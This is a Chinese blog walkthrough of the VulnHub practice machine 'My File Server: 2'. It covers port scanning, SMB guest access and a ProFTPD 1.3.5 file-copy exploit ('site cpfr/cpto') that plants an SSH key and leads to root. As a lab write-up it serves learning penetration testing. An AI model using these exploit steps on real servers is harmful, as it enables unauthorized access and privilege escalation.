看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

这篇具有很好参考价值的文章主要介绍了看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。

Vulnhub靶机下载:

官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机

渗透机:kali IP :192.168.0.104 靶机IP :192.168.0.103

使用命令:nmap -sS -sV -A -n -p- 192.168.0.103

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

发现开启了很多端口 先使用工具老样子扫描80端口 dirsearch 发现了一个readme.txt 得到一个密码:root/root1

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

②:FTP匿名登入

尝试FTP登入 发现没有权限 尝试匿名发现里面也没有可以利用的信息。

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

③:SSH私钥登入

接着尝试SSH登入失败,需要私钥才能登入!

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

④:SMB共享服务:

这里还有个文件共享服务Smb 先尝试使用smbmap 进行扫描查看文件,发现存在私钥文件 等下生成一个进行替换即可。

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

smbclient '\\192.168.159.187\smbdata' guest  #登入smb

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
生成私钥:ssh-keygen

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

⑤:漏洞发现(ProFTPD 1.3.5):

这里还有个2121端口 发现版本号为:ProFTPD 1.3.5 使用本地漏洞库searchsploit搜一下看看有没有相关利用文件

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

⑥:漏洞利用:

发现存在文件复制漏洞尝试利用:

nc 192.168.0.103 2121
site cpfr /smbdata/authorized_keys
site cpto /home/smbuser/.ssh/authorized_keys 	# 一般服务创建时会同时建一个smbuser用户

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

直接ssh 登入smbuser用户 su root 输入上面获取到的密码直接是root权限了

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
至此获取到了flag,渗透测试结束。

Vulnhub靶机渗透总结:

这个靶机难度适中
1.信息收集 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster
2.smb共享 smbmap枚举(工具得使用)ssh私钥登入
3.ProFTPD 1.3.5文件复制漏洞利用

希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!文章来源地址https://www.toymoban.com/news/detail-418009.html

到了这里,关于看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 删除icloud照片手机照片会不见吗?看完这篇你会找到答案

    分两种情况看, 删除iCloud照片手机照片会看不见吗? 这主要看您的iCloud中的设置而定。第一,如果您的iCloud是关闭状态,删掉以前共享到iCloud中的照片的话,手机上的照片还是存在的;第二,如果您的iCloud一直都是共享状态,则手机照片跟iCloud照片是同步的,也就是删除i

    2024年02月06日
    浏览(47)
  • ES是什么?看完这篇就不要再问这种低级问题了!

    ES的核心概念 1. 节点(Node)一个运行中的 Elasticsearch 实例称为一个节点,而集群是由一个或者多个拥有相同cluster.name配置的节点组成, 它们共同承担数据和负载的压力。ES集群中的节点有三种不同的类型,一个节点可以充当一个或多个角色,默认三个角色都有: 主节点:负责

    2024年04月17日
    浏览(50)
  • 【MySQL】看完这篇不信你学不会如何使用数据处理函数

    🎬 博客主页:博主链接 🎥 本文由 M malloc 原创,首发于 CSDN🙉 🎄 学习专栏推荐:LeetCode刷题集! 🏅 欢迎点赞 👍 收藏 ⭐留言 📝 如有错误敬请指正! 📆 未来很长,值得我们全力奔赴更美好的生活✨ 😁大家好呀,今天是我第N次写MySQL,也是最近才学习MySQL,也想着记录

    2024年02月11日
    浏览(46)
  • ai图片合成要如何操作?看完这篇就知道ai绘画怎么弄了

    看看这些图片,是不是很想拿去当头像啊!你们知道这些照片是怎么做的吗?想自己创作出这么好看的头像吗?你听说过ai绘画技术吗?今天我就为大家介绍ai绘画技术是什么,ai图片合成怎么做。话不多说,直接进入正题吧! 合成方法一:利用starryai合成头像 它是一款国外的

    2024年02月14日
    浏览(44)
  • 面试官问 : ArrayList 不是线程安全的,为什么 ?(看完这篇,以后反问面试官)

    金三银四 ? 也许,但是。 近日,又收到金三银四一线作战小队成员反馈的战况 : 我不管你从哪里看的面经,但是我不允许你看到我这篇文章之后,还不清楚这个面试问题。 本篇内容预告:   ArrayList 是线程不安全的, 为什么 ? ① 结合代码去探一探所谓的不安全  ② 我们

    2024年02月02日
    浏览(59)
  • 2023最新网络安全面试题大全,看完这篇你的秋招offer就到手了!

    随着国家政策的扶持,网络安全行业也越来越为大众所熟知,想要进入到网络安全行业的人也越来越多。 为了拿到心仪的 Offer 之外,除了学好网络安全知识以外,还要应对好企业的面试。 作为一个安全老鸟,工作这么多年,面试过很多人也出过很多面试题目,也在网上收集

    2024年02月07日
    浏览(52)
  • 【C++】五一假期,我学会了C++类和对象 ( 看完这篇你也能学会 ~ )

      🧑‍🎓 个人主页:简 料   🏆 所属专栏:C++   🏆 个人社区:越努力越幸运社区   🏆 简       介: 简料简料,简单有料~在校大学生一枚,专注C/C++/GO的干货分享,立志成为您的好帮手 ~ C/C++学习路线 (点击解锁) ❤️ C语言 ❤️ 初阶数据结构与算法 ❤️ C++ ❤️

    2024年02月03日
    浏览(57)
  • 看完这篇都有DBA级别的MySQL备份经验了,再也不害怕删库跑路了

            在做运维的路上,相信大家会跟数据库经常打交道吧,那么数据库最重要的时候什么呢,那么肯定是备份了,这篇文章主要内容是介绍了,MySQL的几种常见的备份方式,主要是分为两种,第一种是基于MySQL提供的工具来进行备份,还有一种是基于使用第三方工具来进行

    2024年02月05日
    浏览(50)
  • 【Kotlin】从Java转向Kotlin,耐心看完这篇博客就够了。Kotlin快速入门教程分享

    适合群体:Java已经入门的人,如果是零基础,不要勉强!虽然没有深奥的术语,即使有也尽可能通俗易懂 。 Kotlin和Java都是Jvm语言,相同的部分能省则省(篇幅有限),重点是Kotlin。 示例代码的注释很重要。最好可以使用IDEA等开发工具运行一下。 最后创作不易,全部都是自

    2023年04月08日
    浏览(56)
  • 【C语言进阶篇】看完这篇结构体文章,我向数据结构又进了一大步!(结构体进阶详解)

    🎬 鸽芷咕 :个人主页  🔥 个人专栏 :《C语言初阶篇》 《C语言进阶篇》 ⛺️生活的理想,就是为了理想的生活!    🌈 hello! 各位宝子们大家好啊,结构体的基本使用和常见错误在上一篇详细讲解过了,不知道大家都学会了没有。    ⛳️ 今天给大家来个硬菜,教点高

    2024年02月15日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包